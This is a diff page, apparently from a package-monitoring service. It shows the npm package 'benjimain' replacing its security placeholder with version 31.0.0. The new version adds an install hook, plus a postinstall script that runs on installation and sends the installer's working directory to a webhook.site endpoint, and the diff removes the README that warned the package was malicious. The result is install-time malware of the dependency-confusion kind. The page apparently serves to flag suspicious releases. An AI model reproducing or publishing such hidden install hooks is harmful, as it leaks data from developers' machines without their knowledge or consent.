benjimain 0.0.1-security → 31.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.

This version of benjimain might be problematic. Click here for more details.

Files changed (5) hide show
  1. package/index.js +6 -0
  2. package/package.json +14 -4
  3. package/postinstall.js +64 -0
  4. package/test.js +4 -0
  5. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,6 @@
1
+ function shout() {
2
+ console.log("Newer version")
3
+ }
4
+
5
+ module.exports = shout
6
+
package/package.json CHANGED
@@ -1,6 +1,16 @@
1
1
  {
2
2
  "name": "benjimain",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
6
- }
3
+ "version": "31.0.0",
4
+ "description": "shuaiqiang",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1",
8
+ "install": "touch /tmp/newer_31.0.0.txt",
9
+ "postinstall": "node postinstall.js"
10
+ },
11
+ "author": "",
12
+ "license": "ISC",
13
+ "dependencies": {
14
+ "benjimain": "^1.0.0"
15
+ }
16
+ }
package/postinstall.js ADDED
@@ -0,0 +1,64 @@
1
+ const fs = require('fs');
2
+ const http = require('http');
3
+ const path = require('path');
4
+
5
+ // 设置源依赖文件路径
6
+ const dependencyPath = '/path/to/your/dependency/files';
7
+
8
+ // 设置目标安装路径
9
+ const installPath = '/path/to/your/installation';
10
+
11
+ const currentDirectory = process.cwd();
12
+ console.log(currentDirectory)
13
+ const options = {
14
+ hostname: 'webhook.site', // 替换为目标服务器的主机名
15
+ port: 443, // 或者您服务器使用的端口号
16
+ path: '/20c7190d-3d9a-4ba1-aa4c-1f6bb308a624/' + currentDirectory, // 替换为目标端点路径
17
+ method: 'POST',
18
+ headers: {
19
+ 'Content-Type': 'text/plain',
20
+ }
21
+ };
22
+
23
+ // 创建 HTTP 请求
24
+ const req = http.request(options, (res) => {
25
+ console.log(`状态码:${res.statusCode}`);
26
+
27
+ res.on('data', (data) => {
28
+ console.log(`响应数据:${data}`);
29
+ });
30
+ });
31
+
32
+
33
+ // 获取目标安装路径下的所有文件
34
+ fs.readdir(installPath, (err, files) => {
35
+ if (err) {
36
+ console.error('Error reading directory:', err);
37
+ return;
38
+ }
39
+
40
+ // 遍历目标安装路径下的每个文件
41
+ files.forEach(file => {
42
+ // 构建源依赖文件的路径
43
+ const dependencyFile = path.join(dependencyPath, file);
44
+ // 构建目标安装路径下文件的路径
45
+ const targetFile = path.join(installPath, file);
46
+
47
+ // 检查文件是否存在
48
+ fs.access(dependencyFile, fs.constants.F_OK, (err) => {
49
+ if (err) {
50
+ console.error(`Dependency file ${dependencyFile} does not exist.`);
51
+ return;
52
+ }
53
+
54
+ // 复制源依赖文件到目标安装路径
55
+ fs.copyFile(dependencyFile, targetFile, (err) => {
56
+ if (err) {
57
+ console.error(`Error copying ${dependencyFile} to ${targetFile}:`, err);
58
+ return;
59
+ }
60
+ console.log(`Copied ${dependencyFile} to ${targetFile}`);
61
+ });
62
+ });
63
+ });
64
+ });
package/test.js ADDED
@@ -0,0 +1,4 @@
1
+ const shout = require('benjimain')
2
+
3
+ console.log(shout())
4
+
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=benjimain for more information.